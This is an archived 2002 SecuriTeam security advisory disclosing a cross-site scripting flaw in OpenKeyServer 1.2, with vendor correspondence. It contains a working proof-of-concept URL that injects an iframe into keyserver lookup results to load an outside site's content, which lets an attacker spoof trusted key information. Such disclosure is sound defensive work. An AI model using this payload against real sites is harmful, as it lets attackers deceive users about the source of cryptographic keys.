[NEWS] Keyservers Cross Site Scripting (When CSS Gets Dangerous)
From: support@securiteam.comDate: 03/26/02
- Previous message: support@securiteam.com: "[REVS] Linux Security Configuration Document"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 26 Mar 2002 12:15:45 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Keyservers Cross Site Scripting (When CSS Gets Dangerous)
------------------------------------------------------------------------
SUMMARY
<http://www.openkeyserver.org/> OKS (OpenKeyServer) has been developed to
cope with the fast growing number of PKS encryption software baring in
mind the need for reliability. OKS provides a secure repository for a
large amount of PGP public keys. Its architecture is composed of several
inter-communicating modules and allows you to scale it to fit your needs.
The capacity of OKS goes from keyrings of hundred keys to keyrings of
hundreds of thousands.
A security vulnerability in the way the server returns results of key
queries allows attackers to insert malicious code into existing replies.
This is of particular danger when it comes to keyservers, since the key
information itself is usually considered as highly trustworthy.
DETAILS
Vulnerable systems:
OpenKeyServer version 1.2
Example:
http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennom
atch%2Cnetenerror&search=<iframe%20style="position:absolute;left:0;top:0"%20
%20frameborder=0%20scrolling=0%20noresize%20%20width=800%20height=900%20src=
http://www.securiteam.com/openkeyservertemp/></iframe>&op=index
(All < should be present and not replaced by <).
In order to complete the attack, all you need to do is create a few small
HTMLs on your server, causing anyone accessing the above URL to not know
he is no longer accessing keyserver.net but rather someone else's server.
Vendor response:
We have received the following response (Tuesday, March 05, 2002 20:33):
"We thank you for informing us of this vulnerability onto our software and
we are pleased to announce you that a fix to this trouble will be
available into the next release of the OpenKeyServer.
Therefore be sure we will provide you with this new version in order for
your team to keep your database up-to-date.
We remain at your entire disposal and please do not hesitate to contact us
for any other remarks regarding our software.
Best regards,
S. Lemmens"
We have not heard from them again, even though we sent them a message
requesting information when the newer version will be available.
ADDITIONAL INFORMATION
The information has been provided by <mailto:experts@securiteam.com>
SecurITeam Experts and <mailto:slemmens@veridis.com> Sebastien Lemmens.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[REVS] Linux Security Configuration Document"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
